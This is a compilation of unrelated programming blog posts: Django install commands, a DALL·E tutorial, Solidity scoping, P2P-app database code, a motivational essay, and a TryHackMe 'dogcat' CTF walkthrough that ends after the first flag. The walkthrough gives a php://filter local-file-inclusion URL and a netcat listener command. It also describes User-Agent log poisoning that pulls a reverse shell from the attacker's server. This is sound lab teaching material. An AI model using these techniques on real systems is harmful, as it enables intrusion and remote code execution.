
PIP Install Django – A Helpful Illustrated Guide


As a Python developer, I love using Django for web development. Its built-in features and clear code structure make building scalable and robust web applications fast and efficient. In fact, I used Django to build my own web app for Python testing and training.

Here’s how you can install Django:

pip install django

Alternatively, you may use any of the following commands to install Django, depending on your specific environment. One of them is likely to work!

💡 If you have only one version of Python installed:

pip install django

💡 If you have Python 3 (and, possibly, other versions) installed:

pip3 install django

💡 If you don't have PIP or it doesn't work:

python -m pip install django
python3 -m pip install django

💡 If you have Linux and you need to fix permissions (use either one):

sudo pip3 install django
pip3 install django --user

💡 If you have Linux with apt (note: the package is named python3-django):

sudo apt install python3-django

💡 If you have Windows and have set up the py alias:

py -m pip install django

💡 If you have Anaconda:

conda install -c anaconda django

💡 If you have Jupyter Notebook:

!pip install django
!pip3 install django
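If you're unsure which Python interpreter a given pip command installs into, this small diagnostic script (an illustrative sketch, not part of the official Django docs) prints the running interpreter and whether Django is importable for it:

```python
import importlib.util
import sys

# The interpreter running this script; install into exactly this one with:
#   /path/to/python -m pip install django
print(sys.executable)

# Check whether Django is importable here, without actually importing it.
spec = importlib.util.find_spec("django")
print("Django found" if spec else "Django NOT installed for this interpreter")
```

If the second line reports that Django is missing, use the printed interpreter path with `-m pip install django` to target the right environment.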

Let’s dive into the installation guides for the different operating systems and environments!

How to Install Django on Windows?

To install the latest Django framework on your Windows machine, run the following commands in your command line or PowerShell:

  • python3 -m pip install --upgrade pip
  • python3 -m pip install --upgrade django

Here’s the code for copy&pasting:

python3 -m pip install --upgrade pip
python3 -m pip install --upgrade django

I really think not enough coders have a solid understanding of PowerShell. If this is you, feel free to check out the following tutorials on the Finxter blog.


How to Install Django on Mac?

Open Terminal (Applications/Terminal) and run:

  • xcode-select --install (you will be prompted to install the Xcode Command Line Tools)
  • sudo easy_install pip (note: easy_install is deprecated; on newer systems, use python3 -m ensurepip --upgrade instead)
  • sudo pip install django
  • pip install django

As an alternative, you can also run the following two commands to update pip and install the Django library:

python3 -m pip install --upgrade pip
python3 -m pip install --upgrade django

You’ve already seen these before, haven’t you?


How to Install Django on Linux?

To upgrade pip and install the Django library, you can use the following two commands, one after the other.

  • python3 -m pip install --upgrade pip
  • python3 -m pip install --upgrade django

Here’s the code for copy&pasting:

python3 -m pip install --upgrade pip
python3 -m pip install --upgrade django

How to Install Django on Ubuntu?

Upgrade pip and install the Django library using the following two commands, one after the other:

  • python3 -m pip install --upgrade pip
  • python3 -m pip install --upgrade django

Here’s the code for copy&pasting:

python3 -m pip install --upgrade pip
python3 -m pip install --upgrade django

How to Install Django in PyCharm?

The simplest way to install Django in PyCharm is to open the terminal tab and run the pip install django command.

This is shown in the following code:

pip install django

Here are the two steps:

  1. Open the Terminal tab in PyCharm
  2. Run pip install django in the terminal to install Django in a virtual environment.

As an alternative, you can also search for Django in the package manager.

However, this is usually an inferior way to install packages because it involves more steps.

How to Install Django in Anaconda?

You can install the Django package with Conda using the command conda install -c anaconda django in your shell or terminal.

Like so:

conda install -c anaconda django

This assumes you’ve already installed conda on your computer. If you haven’t, check out the installation steps on the official page.

How to Install Django in VSCode?

You can install Django in VSCode by using the same command pip install django in your Visual Studio Code shell or terminal.

pip install django

If this doesn’t work — it may raise a No module named 'django' error — chances are that you’ve installed it for the wrong Python version on your system.

To check which Python version your VS Code environment uses, run these two lines in your Python program:

import sys
print(sys.executable)

The output will be the path to the Python installation that runs the code in VS Code.

Now, you can use this path to install Django specifically for that Python version:

/path/to/vscode/python -m pip install django

Wait until the installation is complete and run your code using django again. It should work now!
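To confirm the installation worked for that exact interpreter, here's an optional stdlib-only check (a sketch I'm adding; not part of the original steps):

```python
from importlib import metadata

# Optional sanity check: print the installed Django version,
# or a hint if the package is missing for this interpreter.
try:
    print(metadata.version("django"))
except metadata.PackageNotFoundError:
    print("Django is not installed for this interpreter.")
```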

🚀 Recommended: Django Developer — Income and Opportunity

More Finxter Tutorials

Learning is a continuous process and you’d be wise to never stop learning and improving throughout your life. 👑

What to learn? Your subconsciousness often knows better than your conscious mind what skills you need to reach the next level of success.

I recommend you read at least one tutorial per day (only 5 minutes per tutorial is enough) to make sure you never stop learning!

💡 If you want to make sure you don’t forget your habit, feel free to join our free email academy for weekly fresh tutorials and learning reminders in your INBOX.

Also, skim our list of tutorials and open 3 interesting ones in a new browser tab to start your new — or continue with your existing — learning habit today! 🚀


Thanks for learning with Finxter!

Programmer Humor

❓ Question: How did the programmer die in the shower? ☠

Answer: They read the shampoo bottle instructions:
Lather. Rinse. Repeat.


I Created My First DALL·E Image in Python OpenAI Using Four Easy Steps


I have a problem. I’m addicted to OpenAI. Every day I find new exciting ways to use it. It’s like somebody gave me a magic stick and I use it for stupid things like cleaning the kitchen. But I cannot help it! So, how do you create images with OpenAI in Python? Easy, follow these four steps! 👇

Step 1: Install the OpenAI Python Library

The first step to using OpenAI’s DALL·E in Python is to install the OpenAI Python library. You can do this using pip, a package manager for Python.

Open your terminal and enter the following command:

pip install openai

I have written a whole tutorial on this topic in case this doesn’t work instantly.

💡 Recommended: How to Install OpenAI in Python?

Step 2: Create an OpenAI API Key

OpenAI is not free for coders — but it’s almost free. I only pay a fraction of a cent per request, so no need to be cheap here. 🧑‍💻

Visit the page https://platform.openai.com/account/api-keys and create a new OpenAI key you can use in your code. Copy&paste the API key because you’ll need it in your coding project!

Step 3: Authenticate with OpenAI API Key

Next, you’ll need to authenticate with OpenAI’s API key. You can do this by importing the openai_secret_manager module and calling the get_secret() function. This function will retrieve your OpenAI API key from a secure location, and you can use it to authenticate your API requests.

import openai_secret_manager
import openai

secrets = openai_secret_manager.get_secret("openai")

# Authenticate with OpenAI API Key
openai.api_key = secrets["api_key"]

If this sounds too complex, you can also use the following easier code in your code script to try it out:

import openai

# Authenticate with OpenAI API Key
openai.api_key = 'sk-...'

The disadvantage is that the secret API key is plainly visible to anybody with access to your code file. Never load this code file into a repository such as GitHub!
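A common, safer pattern (a sketch I'm adding here, not part of the original tutorial; the variable name OPENAI_API_KEY is just a widespread convention) is to read the key from an environment variable so it never appears in the source file:

```python
import os

# Read the secret from the environment (set OPENAI_API_KEY in your shell
# or deployment config); adjust the variable name to your setup.
api_key = os.environ.get("OPENAI_API_KEY")

if api_key is None:
    print("Set the OPENAI_API_KEY environment variable first.")
else:
    # Then pass it on, e.g.: openai.api_key = api_key
    print("API key loaded from the environment.")
```

This way the key lives in your shell or deployment configuration, not in your Git history.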

Step 4: Generate Your DALL·E Image

Now that you’re authenticated with OpenAI, you can generate your first DALL·E image. To do this, call the openai.Image.create() function, passing in the model name, prompt, and size of the image you want to create.

import openai

# Authenticate with OpenAI API Key
openai.api_key = 'sk-...'

# Generate an image using DALL·E
response = openai.Image.create(
    model="image-alpha-001",
    prompt="a coder learning with Finxter",
    size="512x512"
)

print(response.data[0]['url'])

In the code above, we specified the DALL·E model we wanted to use (image-alpha-001), provided a prompt for the image we wanted to create (a coder learning with Finxter), and specified the size of the image we wanted to create (512x512).

"a coder learning with Finxter"

Once you’ve generated your image, you can retrieve the image URL from the API response and display it in your Python code or in a web browser.

print(response.data[0]['url'])

Conclusion

OpenAI’s DALL·E is a powerful tool for generating images that can be used in various applications. So exciting! 🤩

With just a few lines of Python code, you can create unique images that match specific text descriptions. By following the four easy steps outlined in this article, you can get started generating your own DALL·E images today.

🚀 Recommended: OpenAI’s Speech-to-Text API: A Comprehensive Guide


Solidity Scoping – A Helpful Guide with Video


As promised in the previous article, we’ll get more closely familiar with the concept of scoping next. We’ll explain what scoping is, why it exists, and how it helps us in programming.


It’s part of our long-standing tradition to make this article (and others) a faithful companion, or a supplement, to the official Solidity documentation.

Scopes Overview

Scope refers to the context in which we can access a defined variable or a function. There are three main types of scope specific to Solidity:

  • global,
  • contract, and
  • function scope.

In the global scope, variables and functions are defined at the global level, i.e., outside of any contract or function, and we can access them from any place in the source code.

In the contract scope, variables and functions are defined within a contract, but outside of any function, so we can access them from anywhere within the specific contract. However, these variables and functions are inaccessible from outside the contract scope.

In the function scope, variables and functions are defined within a function and we can access them exclusively from inside that function.

💡 Note:

The concept of scopes in Solidity is similar to, and based on, the concept of scopes in C99. In both languages, a “scope” refers to the context in which a variable or function is defined and can be accessed.

In C99 (a C language standard from 1999), variables and functions can be defined at either the global level (i.e., outside of any function) or within a function. There is no “contract” scope in C99.

Global Scope

Let’s take a look at a simple example of the global scope:

pragma solidity ^0.6.12;

uint public globalCounter;

function incrementGlobalCounter() public {
    globalCounter++;
}

In this example, the globalCounter variable is defined at the global level and is, therefore, in the global scope. We can access it from anywhere in the code, including from within the incrementGlobalCounter(...) function.

✅ Reminder: Global variables and functions can be accessed and modified by any contract or function that has access to them. We can find this behavior useful for sharing data across contracts or functions, but it can also present security risks if the global variables or functions are not properly protected.

Contract Scope

As explained above, variables and functions defined within a contract (but outside of any function) are in contract scope, and we can access them from anywhere within the contract.

Contract-level variables and functions are useful for storing and manipulating data that is specific to a particular contract and is not meant to be shared with other contracts or functions.

Let’s take a look at a simple example of the contract scope:

pragma solidity ^0.6.12;

contract Counter {
    uint public contractCounter;

    function incrementContractCounter() public {
        contractCounter++;
    }
}

In this example, the contractCounter variable is defined within the Counter contract and is, therefore, in contract scope. It is available for access from anywhere within the Counter contract, including from within the incrementContractCounter() function.

⚡ Warning: We should be aware that contract-level variables and functions are only accessible from within the contract in which they are defined. They cannot be accessed from other contracts or from external accounts.

Function Scope

Variables and functions that are defined within a function are in the function scope and can only be accessed from within that function.

Function-level variables and functions are useful for storing and manipulating data that is specific to a particular function and is not meant to be shared with other functions or with the contract as a whole.

Let’s take a look at the following example of the function scope:

pragma solidity ^0.6.12;

contract Counter {
    function incrementCounter(uint incrementAmount) public {
        uint functionCounter = 0;
        functionCounter += incrementAmount;
    }
}

In this example, the functionCounter variable is defined within the incrementCounter(...) function and is, therefore, in the function scope. It can only be accessed from within the incrementCounter function and is not accessible from other functions or from outside the contract.

C99 Scoping Rules

Now, let’s take a look at an interesting example showing minimal scoping by using curly braces:

// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.5.0 <0.9.0;
contract C {
    function minimalScoping() pure public {
        {
            uint same;
            same = 1;
        }
        {
            uint same;
            same = 3;
        }
    }
}

Each pair of curly braces forms a distinct scope, containing a declaration and an initialization of the variable same.

This example compiles without warnings or errors because each variable’s lifetime is confined to its own disjoint scope, and there is no overlap between the two scopes.

Shadowing

In some special cases, such as the one below demonstrating C99 scoping rules, we come across a phenomenon called shadowing.

💡 Shadowing means that two or more variables share the same name and have intersecting scopes, with the first one in the outer scope and the second one in the inner scope.

Let’s take a closer look to get a better idea of what it’s all about:

// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.5.0 <0.9.0;
// This will report a warning
contract C {
    function f() pure public returns (uint) {
        uint x = 1;
        {
            x = 2; // this will assign to the outer variable
            uint x;
        }
        return x; // x has value 2
    }
}

There are two variables called x; the first one is in the outer scope, and the second one is in the inner scope.

The inner scope is contained in or surrounded by the outer scope.

Therefore, the declaration first initializes the outer variable x with the value 1, the assignment then sets it to 2, and only after that does the declaration of the second (inner) variable x take place.

In this specific case, we’d get a warning from the compiler, because the first (outer) variable x is being shadowed by the second variable x.

⚡ Warning: In versions prior to 0.5.0, Solidity used the same scoping rules as JavaScript: a variable declared at any location within a function would be visible throughout the entire function’s scope. That’s why the example below compiled in Solidity versions before 0.5.0:

// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.5.0 <0.9.0;
// This will not compile
contract C {
    function f() pure public returns (uint) {
        x = 2;
        uint x;
        return x;
    }
}

The code above couldn’t compile in today’s versions of Solidity because an assignment to variable x is attempted before the variable itself is declared. In other words, the inner variable x’s scope starts with the line of its declaration.

Conclusion

In this article, we learned about variable and function scopes.

  • First, we gave an overview of the three different scopes in Solidity.
  • Second, we investigated the global scope by studying an appropriate example.
  • Third, we looked at the contract scope through an appropriate example.
  • Fourth, we learned about the function scope with an appropriate example.
  • Fifth, we glanced at the scoping rules based on C99, a C language standard.
  • Sixth, we learned about shadowing and got an idea of why we should be careful about it.

What’s Next?

This tutorial is part of our extended Solidity documentation with videos and more accessible examples and explanations. You can navigate the series here (all links open in a new tab):


My Journey to Help Build a P2P Social Network – Database Code Structure


Welcome to part 3 of this series, and thank you for sticking around!

I’ve come to realize this might become a rather long series, mainly because it documents two things: the birth of an application and my personal journey in developing it. I know parts 1 and 2 have been very wordy. That changes now. I promise that you will see a lot of code in this episode :-).

Database Code

So after that slight philosophical tidbit, it is time to dive into the actual database code. As I mentioned in the previous article, I chose Deta Space as the database provider for two reasons: the first is its ease of use, and the second is its similarity to my favorite NoSQL database, MongoDB.

💡 Recommended: Please check my article on creating a shopping list in Streamlit on how to set it up. It takes only a few minutes.

For reference, the server directory with all the code to get the FastAPI server working looks as follows:

server
β”œβ”€β”€ db.py
β”œβ”€β”€ main.py
β”œβ”€β”€ models.py
β”œβ”€β”€ requirements.txt
β”œβ”€β”€ .env

All the database code will live in the db.py file. For the Pydantic models, I’ll use models.py.

Database Functions

The database functions are roughly divided into three parts.

  • We first need functionality for everything related to users.
  • Next, we need code that handles everything related to adding and managing friends.
  • The third part covers all the code for managing thoughts. Thoughts are PeerBrain’s equivalent of messages/tweets.

The file will also contain some helper functions to aid with managing the public keys of users. I’ll go into a lot more detail on this in the article about encryption.

To set up our db.py file we first need to import everything needed. As before, I’ll show the entire list and then explain what everything does once we write code that uses it.

"""This file will contain all the database logic for our server module.
It will leverage the Deta Base NoSQL database API."""

from datetime import datetime
import math
from typing import Union
import os
import logging
from pprint import pprint  # pylint: disable=unused-import
from uuid import uuid4

from deta import Deta
from dotenv import load_dotenv
from passlib.context import CryptContext

The #pylint comment you can see above makes pylint skip this import. I use pprint for displaying dictionaries in a readable way when testing. As I don’t use it anywhere in the actual code, pylint would otherwise start to fuss.

💡 Tip: For those interested, pylint is a great tool to check your code for consistency, errors, and code style. It is static, so it can’t detect errors occurring at runtime. I like it even so 🙂.

After importing everything, I first initialize the database. The load_dotenv() call below loads all my environment variables from the .env file.

load_dotenv()

#---DB INIT---#
DETA_KEY = os.getenv("DETA_KEY")
deta = Deta(DETA_KEY)
#---#
USERS = deta.Base("users")
THOUGHTS = deta.Base("thoughts")
KEYS = deta.Base("keys_db")

Once the variables are accessible, I can use the Deta API key to initialize Deta. Creating Bases in Deta is as easy as defining them with deta.Base. I can now call the variable names to perform CRUD operations when needed.

Generate Password Hash

The next part is very important. It generates our password hash so that the password is never stored in readable form. Even if someone gains control of the database itself, they will not be able to use it. CryptContext is part of the passlib library, which can hash passwords in multiple ways. 🙂

#---PW ENCRYPT INIT---#
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")
#---#

def gen_pw_hash(pw: str) -> str:
    """Function that will use the CryptContext module to generate
    and return a hashed version of our password."""
    return pwd_context.hash(pw)
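If you want to see why storing only a hash protects the password, here is a stdlib-only illustration using PBKDF2 from hashlib. Note this is just a sketch for intuition; the actual server code uses passlib's bcrypt, which handles salting and cost factors for you:

```python
import hashlib
import os

# Illustrative only: a salted, stretched hash with PBKDF2 (stdlib).
def hash_pw(pw, salt=None):
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, 100_000)
    return salt, digest

def verify_pw(pw, salt, digest):
    # Recompute the hash and compare; the plaintext is never stored.
    return hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, 100_000) == digest

salt, digest = hash_pw("s3cret")
print(verify_pw("s3cret", salt, digest))  # True
print(verify_pw("wrong", salt, digest))   # False
```

Even with full database access, an attacker only sees the salt and digest, never the original password.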

User Functions

The first of the user functions is the easiest. It uses Deta’s fetch method to retrieve all objects from a certain Base, the USERS Base in our case.

#---USER FUNCTIONS---#
def get_users() -> dict: """Function to return all users from our database""" try: return {user["username"]: user for user in USERS.fetch().items} except Exception as e: # Log the error or handle it appropriately print(f"Error fetching users: {e}") return {}

The fact that the function returns the found users as a dictionary makes them easy to use with FastAPI. As we contact a database in this function and all the others in this block, a try-except block is necessary.

The next two functions are doing the same thing but with different parameters. They accept either a username or an email.

I am aware that these two could be combined into a single function with an if-statement. I still prefer the two separate functions, as I find them easier to use. Another argument is that the email search is primarily an end-user function, while I plan to use searching by username in the background as a helper for other functionality.

def get_user_by_username(username: str) -> Union[dict, None]:
    """Function that returns a User object if it is in the database.
    If not, it returns a JSON object with the message that no user
    exists for that username."""
    try:
        if USERS.fetch({"username": username}).items == []:
            return {"Username": "No user with username found"}
        else:
            return USERS.fetch({"username": username}).items[0]
    except Exception as error_message:
        logging.exception(error_message)
        return None


def get_user_by_email(email: str) -> Union[dict, None]:
    """Function that returns a User object if it is in the database.
    If not, it returns a JSON object with the message that no user
    exists for that email address."""
    try:
        if USERS.fetch({"email": email}).items == []:
            return {"Email": "No user with email found"}
        else:
            return USERS.fetch({"email": email}).items[0]
    except Exception as error_message:
        logging.exception(error_message)
        return None

The functions above both take a parameter that they use to filter the fetch request to the Deta Base users.

If that filtering results in an empty list, a proper message is returned. If the returned list is not empty, we use the .items attribute of the fetch result and return the first item of that list. In both functions, this will be the user object that matches the query string (email or username).

The entire sequence is run inside a try-except block as we are trying to contact a database.

Reset User Password

When working with user creation and databases, a function to reset a user’s password is required. The next function will take care of that.

def change_password(username, pw_to_hash):
    """Function that takes a username and a password in plaintext.
    It will then hash that password. After that, it creates a dictionary
    and tries to match the username to a user in the database.
    If successful, it overwrites the previous password hash. If not, it
    returns a JSON message stating no user could be found for the
    username provided."""
    hashed_pw = gen_pw_hash(pw_to_hash)
    update = {"hashed_pw": hashed_pw}
    try:
        user = get_user_by_username(username)
        user_key = user["key"]
        if username not in get_users():
            return {"Username": "Not Found"}
        else:
            return USERS.update(update, user_key), f"User {username} password changed!"
    except Exception as error_message:
        logging.exception(error_message)
        return None

This function will take a username and a new password. It will first hash that password and then create a dictionary. Updates to a Deta Base are always performed by calling the update method with a dictionary. As in the previous functions, we always check if the username in question exists before calling the update. Also, don’t forget the try-except block!

Create User

The last function is our most important one :-). You can’t perform any operations on user objects if you have no way to create them! Take a look below to check out how we’ll handle that.

def create_user(username: str, email: str, pw_to_hash: str) -> None:
    """Function to create a new user. It takes three strings and inputs
    these into the new_user dictionary. The function then attempts to
    put this dictionary in the database."""
    new_user = {
        "username": username,
        "key": str(uuid4()),
        "hashed_pw": gen_pw_hash(pw_to_hash),
        "email": email,
        "friends": [],
        "disabled": False,
    }
    try:
        return USERS.put(new_user)
    except Exception as error_message:
        logging.exception(error_message)
        return None

The user creation function will take a username, email, and password for now. It will probably become more complex in the future, but it serves our purposes for now. Like the Deta update method, creating a new item in the database requires a dictionary. Some of the necessary attributes for the dictionary are generated inside the function.

The key needs to be unique, so we use Python’s uuid4 function. The friends attribute will contain the usernames of other users but starts as an empty list. The disabled attribute, finally, is set to False.

After finishing the initialization, creating the object is a matter of calling the Deta put method. I hear some of you thinking that we don’t do any checks if the username or email already exists in the database. You are right, but I will perform these checks on the endpoint receiving the post request for user creation.
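Those endpoint checks could be sketched roughly like this; the function and field names below are illustrative assumptions, not the actual PeerBrain code:

```python
# Hypothetical pre-check before calling create_user(); names are illustrative.
def username_or_email_taken(users: dict, username: str, email: str) -> bool:
    """Return True if the username or email already exists among the users.
    `users` has the shape returned by get_users(): {username: user_dict}."""
    if username in users:
        return True
    return any(u.get("email") == email for u in users.values())

existing = {"alice": {"email": "alice@example.com"}}
print(username_or_email_taken(existing, "alice", "x@example.com"))   # True
print(username_or_email_taken(existing, "bob", "alice@example.com")) # True
print(username_or_email_taken(existing, "bob", "bob@example.com"))   # False
```

The endpoint would call a check like this first and return an error response instead of invoking create_user() on a duplicate.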

Some Coding Thoughts and Learnings

GitHub 👈 Join the open-source PeerBrain development community!

One thing that never ceases to amaze me is the amount of documentation I like to add. I do this first in the form of docstrings as it helps me keep track of what function does what. I find it boring most of the time, but in the end, it helps a lot!

The other part of documenting that I like is type hints. I admit they sometimes confuse me still, but I can see the merit they have when an application keeps growing. 

We will handle the rest of the database function in the next article. See you there!

Participate in Building the Decentralized Social Brain Network 👇

As before, I state that I am completely self-taught. This means I’ll make mistakes. If you spot them, please post them on Discord so I can remedy them 🙂

As always, feel free to ask me questions or pass suggestions! And check out the GitHub repository for participation!

👉 GitHub: https://github.com/shandralor/PeerBrain


Cracking the Code to a Better Life: How Learning to Code Can Satisfy the 8 Life Forces


As human beings, we are driven by a number of basic needs and desires that motivate us to take action and pursue our goals. This includes things like survival, enjoyment of life, sexual companionship, comfortable living conditions, and more.

I believe learning to code is a powerful way to satisfy many of these profound life forces. Let’s go over them one by one as a small exercise to keep you motivated for the week! 💪💪💪

Life Forces #1 – Survival, Enjoyment of Life, Life Extension

By learning to code, you can position yourself to take advantage of the many job opportunities that exist in the tech industry, which can provide you with the financial resources you need to support yourself and your loved ones.

The median annual income of a software developer in the US is $120,730, compared to a median income overall of $41,535. No need to say more on this point!

👉 Recommended: Income of Freelance Developer

Additionally, coding can be a fun and rewarding hobby that can help you stay mentally sharp and engaged with the world around you.

Life Forces #2 – Comfortable Living Conditions

By developing skills in programming, prompting, tech, blockchain development, and machine learning, you can position yourself to take advantage of the many high-paying job opportunities that exist in these fields, which can help you achieve the comfortable living conditions you desire.

👉 Recommended: Machine Learning Engineer — Income and Opportunity

Life Forces #3 – To Be Superior and Winning

Don’t underestimate the motivational power of this basic need of human beings!

By mastering the latest programming languages, tools, and techniques, you can position yourself as an expert in your field and achieve a sense of superiority and accomplishment that can drive you to greater success.

Imagine being able to command the power of infinite leverage by programming computers. Wouldn’t controlling an army of artificially intelligent entities help you win?

Life Forces #4 – Sexual Companionship

While learning to code may not directly impact your ability to find sexual companionship, it can provide you with the financial resources and independence you need to pursue romantic relationships on your own terms.

It’s also a status game, after all.

In researching this hypothesis for this post, I came across a lot of scientific evidence on the topic, such as Zhang 2022:

💕 “We found that men with higher social status were more likely to have long-term mating and reproductive success”

DYR!

Life Forces #5 – Freedom From Fear, Pain, and Danger

By achieving financial security and stability through your coding skills, you can achieve a sense of freedom from fear, pain, and danger that can allow you to pursue your dreams and passions without undue worry or stress.

In fact, creating my own coding business online — starting out as a freelance developer on Upwork — has given me all the freedom I ever dreamed of!

👉 Recommended: Read my story here

Life Forces #6 – Care And Protection of Loved Ones

By achieving financial success through your coding skills, you can provide for and protect your loved ones, ensuring they have the resources and security they need to thrive.

Life Forces #7 – Social Approval

By mastering programming, tech, blockchain development, and machine learning skills, you can achieve a sense of social approval and validation from your peers and colleagues, who will respect and admire your expertise and achievements.

Conclusion

✅ In short, learning to code can satisfy many of the life forces that drive us as human beings and can provide you with the skills and resources you need to achieve success and fulfillment in all areas of your life.

If you’re looking to take your career and life to the next level, I encourage you to check out our academy’s courses on programming, tech, blockchain development, ChatGPT, freelancing, and machine learning. They can help you achieve your goals and create the life you’ve always dreamed of.

Thank you for being a part of our community, and we look forward to supporting you on your journey to success and fulfillment.


TryHackMe DogCat Walkthrough [+ Easy Video]


CHALLENGE OVERVIEW

  • Link: THM Dogcat
  • Difficulty: Medium
  • Target: Flags 1-4
  • Highlight: intercepting and modifying a web request using Burp Suite
  • Tools used: base64, Burp Suite
  • Tags: docker, directory traversal

BACKGROUND

In this tutorial, we will walk through a simple website showing pictures of dogs and cats.

We’ll discover a directory traversal vulnerability that we can leverage to view sensitive files on the target machine.

At the end of this challenge, we will break out of a docker container in order to capture the 4th and final flag.

ENUMERATION/RECON

export target=10.10.148.135
export myIP=10.6.2.23

Let’s walk the site.

It looks like a simple image-viewing site that can randomize images of dogs and cats. After toying around with the browser addresses, we find that directory traversal allows us to view other files.

Let’s see if we can grab the HTML code that processes our parameters in the browser address. This will help us understand what is happening on the backend.

We’ll use a simple PHP filter to convert the contents to base64 and output the raw base64 string. 

http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../index

Raw output:

PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKSA/ICRfR0VUWyJleHQiXSA6ICcucGhwJzsKICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3ZpZXcnXSkpIHsKICAgICAgICAgICAgICAgIGlmKGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICdkb2cnKSB8fCBjb250YWluc1N0cigkX0dFVFsndmlldyddLCAnY2F0JykpIHsKICAgICAgICAgICAgICAgICAgICBlY2hvICdIZXJlIHlvdSBnbyEnOwogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3ZpZXcnXSAuICRleHQ7CiAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgIGVjaG8gJ1NvcnJ5LCBvbmx5IGRvZ3Mgb3IgY2F0cyBhcmUgYWxsb3dlZC4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgPz4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+Cg== 

Let’s save this string as a file named β€œstring”. Then we can use the command β€œcat string | base64 -d” to decode this string and view it as raw HTML code.
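If you prefer Python over the shell, the same decoding step looks like this. Note the payload below is a made-up stand-in so the snippet is self-contained, not the real dump above:

```python
import base64

# Stand-in payload (NOT the real dump above), encoded so the example round-trips
payload = b"<?php echo 'dogcat'; ?>"
encoded = base64.b64encode(payload).decode()

# Equivalent of `cat string | base64 -d` on the command line
decoded = base64.b64decode(encoded).decode("utf-8")
print(decoded)  # → <?php echo 'dogcat'; ?>
```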

Reading over this HTML code, we can see that the file extension can be set!

If the user doesn’t specify the extension, the default is .php. This means that we can append β€œ&ext=” to the end of our web address to prevent the .php extension from being added.

In order for it to properly display our request, we need to include the word β€œdog” or β€œcat” in the address.
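To make these two constraints concrete, here is a hedged Python sketch of how the bypass address can be assembled. The IP and parameter values mirror this walkthrough; treat them as placeholders for your own target:

```python
from urllib.parse import urlencode

# Target from this walkthrough -- substitute your own IP
base = "http://10.10.148.135/"

# "view" must contain "dog" or "cat"; an empty "ext" suppresses the default ".php" suffix
params = {"view": "./dog/../flag", "ext": ""}

url = base + "?" + urlencode(params)
print(url)
```

urlencode percent-encodes the slashes, which PHP decodes again on the server side, so the request behaves the same as typing the path into the browser address bar.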

Let’s dive in with burpsuite and start intercepting and modifying requests.

Here is our order of steps for us to get our initial foothold on the target machine:

  1. Create a PHP reverse shell
  2. Start up our netcat listener
  3. Use burp to intercept and modify the web request. Wait until later to click β€œforward”.
  4. Spin up a simple HTTP server with Python in the same directory as the PHP revshell.
  5. Click β€œforward” on burp to send the web request.
  6. Activate the shell by entering: $targetIP/bshell.php in the browser address
  7. Catch the revshell on netcat!

STEP 1

Let’s create a PHP pentest monkey revshell.

STEP 2

Let’s first start up a netcat listener on port 2222.

nc -lnvp 2222

STEP 3

Intercept the web request for the Apache2 log and modify the User-Agent field with PHP code that fetches the shell.php code and saves it as bshell.php on the target machine.

This will work only because, upon examining the Apache2 logs, we noticed that the User-Agent field is logged unsanitized, making it vulnerable to PHP code injection (log poisoning). Make sure to wait to click forward until step 5.
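As a rough sketch of what ends up in the modified request: the payload string, file names (shell.php, bshell.php), and the server address below are assumptions based on this walkthrough, so adjust them to your own setup.

```python
# PHP dropped into the Apache access log via the User-Agent header: when the
# log is later included through the LFI, it fetches shell.php from our HTTP
# server (10.6.2.23:8000 is an assumed address/port) and saves it as bshell.php
payload = ("<?php file_put_contents('bshell.php', "
           "file_get_contents('http://10.6.2.23:8000/shell.php')); ?>")

# In the walkthrough this header is set inside burpsuite; programmatically it
# would boil down to a GET with this header, e.g.:
#   requests.get(log_url, headers=headers)
headers = {"User-Agent": payload}
```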

STEP 4

We’ll spin up a simple Python HTTP server in the same directory as our revshell to serve shell.php to our target machine via the modified web request we created in burpsuite.

STEP 5

Click forward on burp and check to see if code 200 came through for shell.php on the HTTP server.

STEP 6

We can activate the shell from our browser now and hopefully catch it as a revshell on our netcat listener.

STEP 7

We successfully caught it! Now we are in with our initial foothold!

INITIAL FOOTHOLD

LOCATE THE FIRST FLAG

Let’s grab the first flag. We can grab it from our browser again in base64, or via the command line from the revshell.

http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../flag
PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=

Now we can decode this string (saved as firstflag.txt) with base64:

base64 --decode firstflag.txt

<?php
$flag_1 = "THM{Thβ€”------------ommittedβ€”-------fa}"
?>

LOCAL RECON

LOCATE THE SECOND FLAG

